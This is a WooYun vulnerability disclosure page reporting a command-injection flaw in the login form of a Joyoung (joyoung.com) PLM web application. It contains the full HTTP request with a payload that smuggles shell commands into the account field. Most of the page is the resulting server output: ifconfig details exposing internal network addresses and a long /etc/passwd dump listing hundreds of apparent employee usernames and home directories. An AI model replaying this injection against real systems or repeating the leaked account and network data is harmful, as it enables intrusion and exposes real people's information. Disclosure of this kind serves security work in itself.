当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141195

漏洞标题:九阳某站远程命令执行(威胁内网/备份信息泄露)

相关厂商:joyoung.com

漏洞作者: jianFen

提交时间:2015-09-15 09:24

修复时间:2015-10-31 08:54

公开时间:2015-10-31 08:54

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-16: 厂商已经确认,细节仅向厂商公开
2015-09-26: 细节向核心白帽子及相关领域专家公开
2015-10-06: 细节向普通白帽子公开
2015-10-16: 细节向实习白帽子公开
2015-10-31: 细节向公众公开

简要描述:

- -

详细说明:

虽然是thinkphp,如果审核发现能够利用请告诉我让我走出误区 谢谢
我没能getshell echo 上传都shell都无法执行
命令执行在登录框的账号和密码处均可命令执行
https://plmyun.joyoung.com/ease/App/index.php/Public/login

Content-Length: 108
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=u9177ro6og94lfqg495sp7bmf1
Host: plmyun.joyoung.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
account=%22%26ifconfig%26ifconfig%22&password=g00dPa%24%24w0rD&__hash__=e42a907ff9001490dada5f0c13b3c881
br0       Link encap:Ethernet  HWaddr 40:A8:F0:29:13:29  
          inet addr:192.168.11.98  Bcast:192.168.11.255  Mask:255.255.255.0
          inet6 addr: fe80::42a8:f0ff:fe29:1329/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:22059241569 errors:0 dropped:0 overruns:0 frame:0
          TX packets:22333920062 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:5409882021813 (4.9 TiB)  TX bytes:8639746656036 (7.8 TiB)
eth0      Link encap:Ethernet  HWaddr 40:A8:F0:29:13:28  
          inet addr:172.31.1.98  Bcast:172.31.1.255  Mask:255.255.255.0
          inet6 addr: fe80::42a8:f0ff:fe29:1328/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:758278693 errors:0 dropped:0 overruns:0 frame:0
          TX packets:438545616 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:964639054680 (898.3 GiB)  TX bytes:97197596370 (90.5 GiB)
          Interrupt:32 
eth1      Link encap:Ethernet  HWaddr 40:A8:F0:29:13:29  
          inet6 addr: fe80::42a8:f0ff:fe29:1329/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:22970587785 errors:0 dropped:9540 overruns:0 frame:407
          TX packets:23920874618 errors:0 dropped:3 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:5877026644841 (5.3 TiB)  TX bytes:8840284910788 (8.0 TiB)
          Interrupt:36 
eth2      Link encap:Ethernet  HWaddr 40:A8:F0:29:13:2A  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:32 
eth3      Link encap:Ethernet  HWaddr 40:A8:F0:29:13:2B  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:36 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:971540081 errors:0 dropped:0 overruns:0 frame:0
          TX packets:971540081 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:97475129058 (90.7 GiB)  TX bytes:97475129058 (90.7 GiB)
virbr0    Link encap:Ethernet  HWaddr 52:54:00:46:B2:BD  
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
vnet0     Link encap:Ethernet  HWaddr FE:54:00:5E:EE:B4  
          inet6 addr: fe80::fc54:ff:fe5e:eeb4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:43758631 errors:0 dropped:0 overruns:0 frame:0
          TX packets:61359605 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500 
          RX bytes:8347296736 (7.7 GiB)  TX bytes:15490264621 (14.4 GiB)


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pulse:x:497:495:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
stap-server:x:155:155:Systemtap Compile Server:/var/lib/stap-server:/sbin/nologin
xguest:x:500:500:Guest:/home/xguest:/bin/bash
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ident:x:98:98::/:/sbin/nologin
uuidd:x:496:491:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
nslcd:x:65:55:LDAP Client User:/:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
vnc:x:501:501::/home/vnc:/bin/bash
chenping:x:502:502::/share/Home1/chenping/work:/bin/bash
tianmaosheng:x:503:503::/share/Home2/tianmaosheng/work:/bin/bash
tangxiaojun:x:504:504::/share/Home3/tangxiaojun/work:/bin/bash
fuqunmin:x:505:505::/share/Home1/fuqunmin/work:/bin/bash
futantan:x:506:506::/share/Home2/futantan/work:/bin/bash
yzdong:x:507:507::/share/Home3/yzdong/work:/bin/bash
limingliang:x:510:510::/share/Home3/limingliang/work:/bin/bash
qifuya:x:511:511::/share/Home1/qifuya/work:/bin/bash
lipenghui:x:512:512::/share/Home2/lipenghui/work:/bin/bash
qiuxiongjie:x:513:513::/share/Home3/qiuxiongjie/work:/bin/bash
xinhong:x:514:514::/share/Home1/xinhong/work:/bin/bash
luli:x:515:515::/share/Home2/luli/work:/bin/bash
pengbihua:x:516:516::/share/Home3/pengbihua/work:/bin/bash
yanfanzhang:x:517:517::/share/Home1/yanfanzhang/work:/bin/bash
chenjianqiang:x:518:518::/share/Home2/chenjianqiang/work:/bin/bash
chenjingshu:x:519:519::/share/Home3/chenjingshu/work:/bin/bash
chenxufeng:x:520:520::/share/Home1/chenxufeng/work:/bin/bash
qintao:x:521:521::/share/Home2/qintao/work:/bin/bash
hupeng:x:522:522::/share/Home3/hupeng/work:/bin/bash
tanweichao:x:523:523::/share/Home1/tanweichao/work:/bin/bash
zhoujiandong:x:524:524::/share/Home2/zhoujiandong/work:/bin/bash
liuhongyang:x:525:525::/share/Home3/liuhongyang/work:/bin/bash
luopeng:x:526:526::/share/Home1/luopeng/work:/bin/bash
linminyong:x:527:527::/share/Home2/linminyong/work:/bin/bash
guoyubo:x:528:528::/share/Home3/guoyubo/work:/bin/bash
wangguohai:x:529:529::/share/Home1/wangguohai/work:/bin/bash
liuyuan:x:530:530::/share/Home2/liuyuan/work:/bin/bash
huchaobing:x:531:531::/share/Home3/huchaobing/work:/bin/bash
fangguiming:x:532:532::/share/Home1/fangguiming/work:/bin/bash
wangwenjing:x:533:533::/share/Home2/wangwenjing/work:/bin/bash
yuezhichao:x:534:534::/share/Home3/yuezhichao/work:/bin/bash
laiqisheng:x:535:535::/share/Home1/laiqisheng/work:/bin/bash
lidongbo:x:536:536::/share/Home2/lidongbo/work:/bin/bash
mawen:x:537:537::/share/Home3/mawen/work:/bin/bash
hujunwen:x:538:538::/share/Home1/hujunwen/work:/bin/bash
zhangdezhi:x:539:539::/share/Home2/zhangdezhi/work:/bin/bash
louhao:x:540:540::/share/Home3/louhao/work:/bin/bash
wangjunfang:x:541:541::/share/Home1/wangjunfang/work:/bin/bash
yuchiyanmin:x:542:542::/share/Home2/yuchiyanmin/work:/bin/bash
liuchao2:x:543:543::/share/Home3/liuchao2/work:/bin/bash
mingjinwu:x:544:544::/share/Home1/mingjinwu/work:/bin/bash
huanglongfa:x:546:546::/share/Home3/huanglongfa/work:/bin/bash
sufeng:x:547:547::/share/Home1/sufeng/work:/bin/bash
liuxiaoqiang:x:548:548::/share/Home2/liuxiaoqiang/work:/bin/bash
guomingsheng:x:550:550::/share/Home1/guomingsheng/work:/bin/bash
tianhongbo:x:551:551::/share/Home2/tianhongbo/work:/bin/bash
liujian1:x:552:552::/share/Home3/liujian1/work:/bin/bash
wangtao4:x:553:553::/share/Home1/wangtao4/work:/bin/bash
zhangyonggang:x:554:554::/share/Home2/zhangyonggang/work:/bin/bash
xieronghua:x:555:555::/share/Home3/xieronghua/work:/bin/bash
xudengfeng:x:556:556::/share/Home1/xudengfeng/work:/bin/bash
jianglianyang:x:557:557::/share/Home2/jianglianyang/work:/bin/bash
liyutao:x:558:558::/share/Home3/liyutao/work:/bin/bash
xuedongwei:x:559:559::/share/Home1/xuedongwei/work:/bin/bash
linqingze:x:560:560::/share/Home2/linqingze/work:/bin/bash
zhanghongyuan:x:561:561::/share/Home3/zhanghongyuan/work:/bin/bash
fanglang:x:562:562::/share/Home1/fanglang/work:/bin/bash
huangduo:x:563:563::/share/Home2/huangduo/work:/bin/bash
zhaoshanyun:x:564:564::/share/Home3/zhaoshanyun/work:/bin/bash
jinwenwei:x:565:565::/share/Home1/jinwenwei/work:/bin/bash
zhanyingan:x:566:566::/share/Home2/zhanyingan/work:/bin/bash
zhangjiagu:x:567:567::/share/Home3/zhangjiagu/work:/bin/bash
liubin3:x:568:568::/share/Home1/liubin3/work:/bin/bash
zhaodaoyin:x:569:569::/share/Home2/zhaodaoyin/work:/bin/bash
wuyanhua:x:570:570::/share/Home3/wuyanhua/work:/bin/bash
yuqinghui:x:571:571::/share/Home1/yuqinghui/work:/bin/bash
liangjiawen:x:572:572::/share/Home2/liangjiawen/work:/bin/bash
zhouzhizheng:x:573:573::/share/Home3/zhouzhizheng/work:/bin/bash
fanbo:x:574:574::/share/Home1/fanbo/work:/bin/bash
huangqilang:x:575:575::/share/Home2/huangqilang/work:/bin/bash
wanglinghua:x:576:576::/share/Home3/wanglinghua/work:/bin/bash
jiashuang:x:577:577::/share/Home1/jiashuang/work:/bin/bash
liushengping:x:578:578::/share/Home2/liushengping/work:/bin/bash
yaojunhua:x:579:579::/share/Home3/yaojunhua/work:/bin/bash
xinqi:x:580:580::/share/Home1/xinqi/work:/bin/bash
jiangliu:x:583:583::/share/Home1/jiangliu/work:/bin/bash
jingjin:x:584:584::/share/Home2/jingjin/work:/bin/bash
shiyan:x:585:585::/share/Home3/shiyan/work:/bin/bash
tangyonghua:x:586:586::/share/Home1/tangyonghua/work:/bin/bash
liyongsheng:x:587:587::/share/Home2/liyongsheng/work:/bin/bash
sujuan:x:588:588::/share/Home3/sujuan/work:/bin/bash
chenyuenan:x:589:589::/share/Home1/chenyuenan/work:/bin/bash
chenlong:x:590:590::/share/Home2/chenlong/work:/bin/bash
yaodandan:x:591:591::/share/Home3/yaodandan/work:/bin/bash
wangjian:x:592:592::/share/Home1/wangjian/work:/bin/bash
fangyan:x:593:593::/share/Home2/fangyan/work:/bin/bash
zhengtianxian:x:595:595::/share/Home1/zhengtianxian/work:/bin/bash
songjia:x:596:596::/share/Home2/songjia/work:/bin/bash
liuxianming:x:597:597::/share/Home3/liuxianming/work:/bin/bash
zhangwei7:x:598:598::/share/Home1/zhangwei7/work:/bin/bash
linmiansong:x:599:599::/share/Home2/linmiansong/work:/bin/bash
qifeifei:x:610:610::/share/Home3/qifeifei/work:/bin/bash
mengqinghao:x:611:611::/share/Home1/mengqinghao/work:/bin/bash
shizhongzhong:x:612:612::/share/Home2/shizhongzhong/work:/bin/bash
qiaohonglei:x:613:613::/share/Home3/qiaohonglei/work:/bin/bash
zhangjunliang:x:614:614::/share/Home1/zhangjunliang/work:/bin/bash
caibaoquan:x:615:615::/share/Home2/caibaoquan/work:/bin/bash
zhaokelong:x:616:616::/share/Home3/zhaokelong/work:/bin/bash
gexuan:x:617:617::/share/Home1/gexuan/work:/bin/bash
zhaoxiaolei:x:618:618::/share/Home2/zhaoxiaolei/work:/bin/bash
wujinya:x:619:619::/share/Home3/wujinya/work:/bin/bash
huangxiaoliang2:x:620:620::/share/Home1/huangxiaoliang2/work:/bin/bash
wangfei2:x:621:621::/share/Home2/wangfei2/work:/bin/bash
wangjian6:x:622:622::/share/Home3/wangjian6/work:/bin/bash
pengyonghua:x:623:623::/share/Home1/pengyonghua/work:/bin/bash
liuchenyang:x:624:624::/share/Home2/liuchenyang/work:/bin/bash
tonglinfei:x:625:625::/share/Home3/tonglinfei/work:/bin/bash
yangguang:x:626:626::/share/Home1/yangguang/work:/bin/bash
rensanqing:x:627:627::/share/Home2/rensanqing/work:/bin/bash
xiaowei:x:628:628::/share/Home3/xiaowei/work:/bin/bash
panshengjiang:x:629:629::/share/Home1/panshengjiang/work:/bin/bash
niexiaojiang:x:630:630::/share/Home2/niexiaojiang/work:/bin/bash
wuzhenyuan:x:631:631::/share/Home3/wuzhenyuan/work:/bin/bash
jingbuwei:x:632:632::/share/Home1/jingbuwei/work:/bin/bash
jiliang:x:633:633::/share/Home2/jiliang/work:/bin/bash
yanghaifeng:x:634:634::/share/Home3/yanghaifeng/work:/bin/bash
hewenbin:x:635:635::/share/Home1/hewenbin/work:/bin/bash
liaozhiwei:x:636:636::/share/Home2/liaozhiwei/work:/bin/bash
luzhongke:x:637:637::/share/Home3/luzhongke/work:/bin/bash
zhangpei:x:638:638::/share/Home1/zhangpei/work:/bin/bash
guoyanna:x:639:639::/share/Home2/guoyanna/work:/bin/bash
xiana:x:640:640::/share/Home3/xiana/work:/bin/bash
mihang:x:641:641::/share/Home1/mihang/work:/bin/bash
caomin:x:642:642::/share/Home2/caomin/work:/bin/bash
zhengyoubin:x:643:643::/share/Home3/zhengyoubin/work:/bin/bash
zhaobenxiang:x:644:644::/share/Home1/zhaobenxiang/work:/bin/bash
jiaorukang:x:645:645::/share/Home2/jiaorukang/work:/bin/bash
hanguanglai:x:646:646::/share/Home3/hanguanglai/work:/bin/bash
chengzhenyu:x:647:647::/share/Home1/chengzhenyu/work:/bin/bash
zhangyue:x:648:648::/share/Home2/zhangyue/work:/bin/bash
yugengqian:x:649:649::/share/Home3/yugengqian/work:/bin/bash
zhangjiafeng:x:650:650::/share/Home1/zhangjiafeng/work:/bin/bash
liudunguo:x:651:651::/share/Home2/liudunguo/work:/bin/bash
mahongyun:x:652:652::/share/Home3/mahongyun/work:/bin/bash
sunligang:x:653:653::/share/Home1/sunligang/work:/bin/bash
wangdong3:x:654:654::/share/Home2/wangdong3/work:/bin/bash
panshasha:x:655:655::/share/Home3/panshasha/work:/bin/bash
chenhao:x:656:656::/share/Home1/chenhao/work:/bin/bash
shumo:x:657:657::/share/Home2/shumo/work:/bin/bash
zhangxiaochuan:x:658:658::/share/Home3/zhangxiaochuan/work:/bin/bash
leishenpiao:x:659:659::/share/Home1/leishenpiao/work:/bin/bash
wuya:x:660:660::/share/Home2/wuya/work:/bin/bash
yudan2:x:661:661::/share/Home3/yudan2/work:/bin/bash
maoyalan:x:662:662::/share/Home1/maoyalan/work:/bin/bash
chenyingke:x:663:663::/share/Home2/chenyingke/work:/bin/bash
caozheng:x:664:664::/share/Home3/caozheng/work:/bin/bash
tanglihua:x:665:665::/share/Home1/tanglihua/work:/bin/bash
yuanzhihui:x:666:666::/share/Home2/yuanzhihui/work:/bin/bash
taowenhua:x:667:667::/share/Home3/taowenhua/work:/bin/bash
guohongwei:x:668:668::/share/Home1/guohongwei/work:/bin/bash
huafeng:x:669:669::/share/Home2/huafeng/work:/bin/bash
liubo1:x:670:670::/share/Home3/liubo1/work:/bin/bash
sunhao1:x:671:671::/share/Home1/sunhao1/work:/bin/bash
wanjun:x:672:672::/share/Home2/wanjun/work:/bin/bash
suishouzhen:x:673:673::/share/Home3/suishouzhen/work:/bin/bash
wuhuawei:x:674:674::/share/Home1/wuhuawei/work:/bin/bash
liuhao3:x:675:675::/share/Home2/liuhao3/work:/bin/bash
zhangfeng:x:676:676::/share/Home3/zhangfeng/work:/bin/bash
shijixia:x:677:677::/share/Home1/shijixia/work:/bin/bash
lvwei:x:678:678::/share/Home2/lvwei/work:/bin/bash
zhaokai:x:679:679::/share/Home3/zhaokai/work:/bin/bash
zhangying2:x:680:680::/share/Home1/zhangying2/work:/bin/bash
sijiayong:x:681:681::/share/Home2/sijiayong/work:/bin/bash
liuhao5:x:682:682::/share/Home3/liuhao5/work:/bin/bash
songtinghai:x:683:683::/share/Home1/songtinghai/work:/bin/bash
wuguihua:x:684:684::/share/Home2/wuguihua/work:/bin/bash
liuqibo:x:685:685::/share/Home3/liuqibo/work:/bin/bash
zhanglei:x:686:686::/share/Home1/zhanglei/work:/bin/bash
yangjian:x:687:687::/share/Home2/yangjian/work:/bin/bash
wangchangting:x:688:688::/share/Home3/wangchangting/work:/bin/bash
jiangxue:x:689:689::/share/Home1/jiangxue/work:/bin/bash
wangjianhua:x:690:690::/share/Home2/wangjianhua/work:/bin/bash
liyanchao:x:691:691::/share/Home3/liyanchao/work:/bin/bash
caisuyun:x:692:692::/share/Home1/caisuyun/work:/bin/bash
wanghua:x:693:693::/share/Home2/wanghua/work:/bin/bash
tangyanhui:x:694:694::/share/Home3/tangyanhui/work:/bin/bash
yanglingli:x:695:695::/share/Home1/yanglingli/work:/bin/bash
ningwentao:x:696:696::/share/Home2/ningwentao/work:/bin/bash
zhangwenfan:x:697:697::/share/Home3/zhangwenfan/work:/bin/bash
zhoulingling:x:698:698::/share/Home1/zhoulingling/work:/bin/bash
liyaping:x:699:699::/share/Home2/liyaping/work:/bin/bash
linyan:x:700:700::/share/Home3/linyan/work:/bin/bash
wangzongtian:x:701:701::/share/Home1/wangzongtian/work:/bin/bash
lizongjun:x:702:702::/share/Home2/lizongjun/work:/bin/bash
zhanghongfeng:x:703:703::/share/Home3/zhanghongfeng/work:/bin/bash
chengxiaomin:x:704:704::/share/Home1/chengxiaomin/work:/bin/bash
yanrongzhi:x:705:705::/share/Home2/yanrongzhi/work:/bin/bash
chenzonghao:x:706:706::/share/Home3/chenzonghao/work:/bin/bash
pengkang:x:707:707::/share/Home1/pengkang/work:/bin/bash
fengzheng:x:708:708::/share/Home2/fengzheng/work:/bin/bash
zhongyumeng:x:709:709::/share/Home3/zhongyumeng/work:/bin/bash
zhangfangfang:x:710:710::/share/Home1/zhangfangfang/work:/bin/bash
wanglu:x:711:711::/share/Home2/wanglu/work:/bin/bash
yangfujian:x:712:712::/share/Home3/yangfujian/work:/bin/bash
wuturong:x:713:713::/share/Home1/wuturong/work:/bin/bash
huanghaijun:x:714:714::/share/Home2/huanghaijun/work:/bin/bash
lijun4:x:715:715::/share/Home3/lijun4/work:/bin/bash
zhangle:x:716:716::/share/Home1/zhangle/work:/bin/bash
maoshuhai:x:717:717::/share/Home2/maoshuhai/work:/bin/bash
yangjinfeng:x:718:718::/share/Home3/yangjinfeng/work:/bin/bash
liujunting:x:719:719::/share/Home1/liujunting/work:/bin/bash
huyouxiang:x:720:720::/share/Home2/huyouxiang/work:/bin/bash
wangquanfu:x:721:721::/share/Home3/wangquanfu/work:/bin/bash
wucongxiang:x:722:722::/share/Home1/wucongxiang/work:/bin/bash
wangliansheng:x:723:723::/share/Home2/wangliansheng/work:/bin/bash
zhangxueyan:x:724:724::/share/Home3/zhangxueyan/work:/bin/bash
jinenlai:x:725:725::/share/Home1/jinenlai/work:/bin/bash
luriquan:x:726:726::/share/Home2/luriquan/work:/bin/bash
fangyanhua:x:727:727::/share/Home3/fangyanhua/work:/bin/bash
ganshengtao:x:728:728::/share/Home1/ganshengtao/work:/bin/bash
dingdongdong:x:729:729::/share/Home2/dingdongdong/work:/bin/bash
wangpengbo:x:730:730::/share/Home3/wangpengbo/work:/bin/bash
jiangjunjun:x:731:731::/share/Home1/jiangjunjun/work:/bin/bash
panliang:x:732:732::/share/Home2/panliang/work:/bin/bash
yangbin:x:733:733::/share/Home3/yangbin/work:/bin/bash
huluyan:x:734:734::/share/Home1/huluyan/work:/bin/bash
panzhengbing:x:735:735::/share/Home2/panzhengbing/work:/bin/bash
hongjun:x:736:736::/share/Home3/hongjun/work:/bin/bash
zhangzheng3:x:737:737::/share/Home1/zhangzheng3/work:/bin/bash
likai2:x:738:738::/share/Home2/likai2/work:/bin/bash
xiating:x:739:739::/share/Home3/xiating/work:/bin/bash
wanghuailiang:x:740:740::/share/Home1/wanghuailiang/work:/bin/bash
liaochaozheng:x:741:741::/share/Home2/liaochaozheng/work:/bin/bash
wangqin2:x:742:742::/share/Home3/wangqin2/work:/bin/bash
chendi:x:743:743::/share/Home1/chendi/work:/bin/bash
xudonghai:x:744:744::/share/Home2/xudonghai/work:/bin/bash
wangzhiwei:x:745:745::/share/Home3/wangzhiwei/work:/bin/bash
zhuruixue:x:746:746::/share/Home1/zhuruixue/work:/bin/bash
penghelin:x:747:747::/share/Home2/penghelin/work:/bin/bash
yangyunhua:x:748:748::/share/Home3/yangyunhua/work:/bin/bash
maji3:x:749:749::/share/Home1/maji3/work:/bin/bash
zhaoying:x:750:750::/share/Home2/zhaoying/work:/bin/bash
wenchunting:x:751:751::/share/Home3/wenchunting/work:/bin/bash
wangliying:x:752:752::/share/Home1/wangliying/work:/bin/bash
chendongpo:x:753:753::/share/Home2/chendongpo/work:/bin/bash
wangyaxi:x:754:754::/share/Home3/wangyaxi/work:/bin/bash
haohuiping:x:755:755::/share/Home1/haohuiping/work:/bin/bash
yaominda:x:756:756::/share/Home2/yaominda/work:/bin/bash
zhoulingjuan:x:757:757::/share/Home3/zhoulingjuan/work:/bin/bash
wangshenghua:x:758:758::/share/Home1/wangshenghua/work:/bin/bash
yexiangyun:x:759:759::/share/Home2/yexiangyun/work:/bin/bash
shenyongguo:x:760:760::/share/Home3/shenyongguo/work:/bin/bash
tangfeng:x:761:761::/share/Home1/tangfeng/work:/bin/bash
zhouhui:x:762:762::/share/Home2/zhouhui/work:/bin/bash
miaoyingli:x:763:763::/share/Home3/miaoyingli/work:/bin/bash
mayunlei:x:764:764::/share/Home1/mayunlei/work:/bin/bash
liutongliang:x:765:765::/share/Home2/liutongliang/work:/bin/bash
kangyong:x:766:766::/share/Home3/kangyong/work:/bin/bash
qinlimei:x:767:767::/share/Home1/qinlimei/work:/bin/bash
zhulei:x:768:768::/share/Home2/zhulei/work:/bin/bash
zhaobinxiang:x:769:769::/share/Home3/zhaobinxiang/work:/bin/bash
wangyi:x:770:770::/share/Home1/wangyi/work:/bin/bash
xiejing:x:771:771::/share/Home2/xiejing/work:/bin/bash
liuxiujuan:x:772:772::/share/Home3/liuxiujuan/work:/bin/bash
chenjing:x:773:773::/share/Home1/chenjing/work:/bin/bash
zhengting:x:774:774::/share/Home2/zhengting/work:/bin/bash
zhangjian:x:775:775::/share/Home3/zhangjian/work:/bin/bash
guowangsong:x:776:776::/share/Home1/guowangsong/work:/bin/bash
sunqiaobo:x:777:777::/share/Home2/sunqiaobo/work:/bin/bash
hubingqing:x:778:778::/share/Home3/hubingqing/work:/bin/bash
wangyunbin:x:779:779::/share/Home1/wangyunbin/work:/bin/bash
wanghuijun:x:780:780::/share/Home2/wanghuijun/work:/bin/bash
zhaoguofeng:x:781:781::/share/Home3/zhaoguofeng/work:/bin/bash
zhangyuyin:x:782:782::/share/Home1/zhangyuyin/work:/bin/bash
wangshihui:x:783:783::/share/Home2/wangshihui/work:/bin/bash
yangkaiqing:x:784:784::/share/Home3/yangkaiqing/work:/bin/bash
liuhongqin:x:785:785::/share/Home1/liuhongqin/work:/bin/bash
zhanglixin:x:786:786::/share/Home2/zhanglixin/work:/bin/bash
jiangjinxing:x:787:787::/share/Home3/jiangjinxing/work:/bin/bash
zhipenglong:x:788:788::/share/Home1/zhipenglong/work:/bin/bash
songfei:x:789:789::/share/Home2/songfei/work:/bin/bash
wangqingwei:x:790:790::/share/Home3/wangqingwei/work:/bin/bash
jichangluo:x:791:791::/share/Home1/jichangluo/work:/bin/bash
wangyu5:x:792:792::/share/Home2/wangyu5/work:/bin/bash
jiangxinyong:x:793:793::/share/Home3/jiangxinyong/work:/bin/bash
liujian5:x:794:794::/share/Home1/liujian5/work:/bin/bash
surongqing:x:795:795::/share/Home2/surongqing/work:/bin/bash
guoxianbing:x:796:796::/share/Home3/guoxianbing/work:/bin/bash
chenxiangke:x:797:797::/share/Home1/chenxiangke/work:/bin/bash
lumenglin:x:798:798::/share/Home2/lumenglin/work:/bin/bash
jinjian:x:799:799::/share/Home3/jinjian/work:/bin/bash
huangdongren:x:800:800::/share/Home1/huangdongren/work:/bin/bash
wangyiwei:x:801:801::/share/Home2/wangyiwei/work:/bin/bash
zhangzheng:x:802:802::/share/Home3/zhangzheng/work:/bin/bash
liaoqujun:x:803:803::/share/Home1/liaoqujun/work:/bin/bash
oujun1:x:804:804::/share/Home2/oujun1/work:/bin/bash
zhanyongquan:x:805:805::/share/Home3/zhanyongquan/work:/bin/bash
linxiaocai:x:806:806::/share/Home1/linxiaocai/work:/bin/bash
dinglifu:x:807:807::/share/Home2/dinglifu/work:/bin/bash
fangshu:x:808:808::/share/Home3/fangshu/work:/bin/bash
wanghui8:x:809:809::/share/Home1/wanghui8/work:/bin/bash
zhouwei:x:810:810::/share/Home2/zhouwei/work:/bin/bash
hanxianjin:x:811:811::/share/Home3/hanxianjin/work:/bin/bash
zhuhe:x:812:812::/share/Home1/zhuhe/work:/bin/bash
fangzhunzheng:x:813:813::/share/Home2/fangzhunzheng/work:/bin/bash
zhouliang:x:814:814::/share/Home3/zhouliang/work:/bin/bash
zhangguoheng:x:815:815::/share/Home1/zhangguoheng/work:/bin/bash
yangwanyin:x:816:816::/share/Home2/yangwanyin/work:/bin/bash
zhangcaiwen:x:817:817::/share/Home3/zhangcaiwen/work:/bin/bash
sangliang:x:818:818::/share/Home1/sangliang/work:/bin/bash
lizhengjiang:x:819:819::/share/Home2/lizhengjiang/work:/bin/bash
wangguoqing:x:820:820::/share/Home3/wangguoqing/work:/bin/bash
tandongsheng:x:821:821::/share/Home1/tandongsheng/work:/bin/bash
huping:x:822:822::/share/Home2/huping/work:/bin/bash
maliangliang:x:823:823::/share/Home3/maliangliang/work:/bin/bash
yangxinguo:x:824:824::/share/Home1/yangxinguo/work:/bin/bash
changguimin:x:825:825::/share/Home2/changguimin/work:/bin/bash
yangchunrong:x:826:826::/share/Home3/yangchunrong/work:/bin/bash
tangzuoqing:x:827:827::/share/Home1/tangzuoqing/work:/bin/bash
cuixiaohua:x:828:828::/share/Home2/cuixiaohua/work:/bin/bash
yanguohua:x:829:829::/share/Home3/yanguohua/work:/bin/bash
